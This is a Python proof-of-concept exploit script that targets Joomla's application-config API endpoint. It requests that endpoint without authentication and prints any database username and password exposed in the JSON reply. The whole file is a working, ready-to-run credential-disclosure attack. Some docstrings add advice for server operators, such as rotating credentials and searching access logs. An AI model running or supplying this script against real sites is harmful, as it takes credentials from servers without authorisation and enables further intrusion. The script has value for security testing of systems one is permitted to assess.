#!/usr/bin/python3
# usage: python3 exploit.py http://<url>
# 0xjr: join the discord, link in github bio
import requests
import sys
from colorama import Fore, init
import json
from urllib.parse import urljoin
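# Reset colour codes automatically after each print call.
init(autoreset=True)

# Banner shown once at start-up.
# Raw string: the ASCII art contains backslash sequences ("\/", "\_") that are
# not valid escapes; in a normal literal newer Python versions warn about them.
# The text printed is unchanged.
banner = r"""
__ __ __
/ /___ ____ ____ ___ / /___ _/ /
__ / / __ \/ __ \/ __ `__ \/ / __ `/ /
/ /_/ / /_/ / /_/ / / / / / / / /_/ /_/
\____/\____/\____/_/ /_/ /_/_/\__,_(_)
PoC By: 0xjr
Join the discord! Link in my github bio!
"""
print(f"{Fore.BLUE}{banner}")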
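def get_url(base_url):
    """Query the application-config API endpoint and report exposed credentials.

    Sends a single GET with no authentication material to
    ``/api/index.php/v1/config/application?public=true`` on ``base_url``,
    walks the JSON reply for ``user`` and ``password`` keys, and prints the
    outcome. Nothing is returned; every result and error goes to stdout.

    Args:
        base_url: Scheme and host of the server being assessed. The API path
            is absolute, so ``urljoin`` drops any path part of ``base_url``.

    Notes for whoever operates the server: a reply containing both keys means
    the configuration was readable without a session, so the disclosed
    credentials should be treated as compromised and rotated once access to
    the endpoint is fixed. The request path and the ``public=true`` query
    string are what to search for in web-server access logs.
    """
    # Upper bound in seconds for connecting and for each read; without it
    # requests waits indefinitely on a host that never answers.
    request_timeout = 10

    def find_keys(node, keys):
        """Depth-first walk of decoded JSON, filling ``keys`` in place.

        A later occurrence of a wanted key overwrites an earlier one.
        """
        if isinstance(node, dict):
            for k, v in node.items():
                if k in keys:
                    keys[k] = v
                if isinstance(v, (dict, list)):
                    find_keys(v, keys)
        elif isinstance(node, list):
            for item in node:
                find_keys(item, keys)

    try:
        api_path = "/api/index.php/v1/config/application?public=true"
        url = urljoin(base_url, api_path)
        print(f"{Fore.BLUE}[~] Info: Trying, {url}.")

        response = requests.get(url, timeout=request_timeout)
        # Any 4xx/5xx status is reported through the HTTPError handler below.
        response.raise_for_status()
        data = response.json()

        keys = {"user": None, "password": None}
        find_keys(data, keys)

        # Both values must be present and non-empty to count as a finding.
        if keys["user"] and keys["password"]:
            print(f"{Fore.GREEN}[+] Success: Found username: {keys['user']}")
            print(f"{Fore.GREEN}[+] Success: Found password: {keys['password']}")
        else:
            print(f"{Fore.YELLOW}[!] Warning: Sensitive information not found in the response.")
    except requests.ConnectionError as e:
        print(f"{Fore.RED}[-] Error: {e}")
    except requests.Timeout as e:
        # Read timeouts are not ConnectionError subclasses; name them
        # explicitly instead of reporting them as "unexpected".
        print(f"{Fore.RED}[-] Timeout: {e}")
    except requests.HTTPError as e:
        print(f"{Fore.RED}[-] HTTP Error: {e}")
    except json.JSONDecodeError as e:
        print(f"{Fore.RED}[-] JSON Decode Error: {e}")
    except Exception as e:
        # Last-resort handler so the script always ends with a message.
        print(f"{Fore.RED}[-] An unexpected error occurred: {e}")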
if __name__ == "__main__":
    # Exactly one positional argument is accepted: the base URL to check.
    cli_args = sys.argv[1:]
    if len(cli_args) == 1:
        get_url(cli_args[0])
    else:
        print(f"{Fore.RED}[-] Usage: python3 {sys.argv[0]} http://<url>")
        sys.exit(1)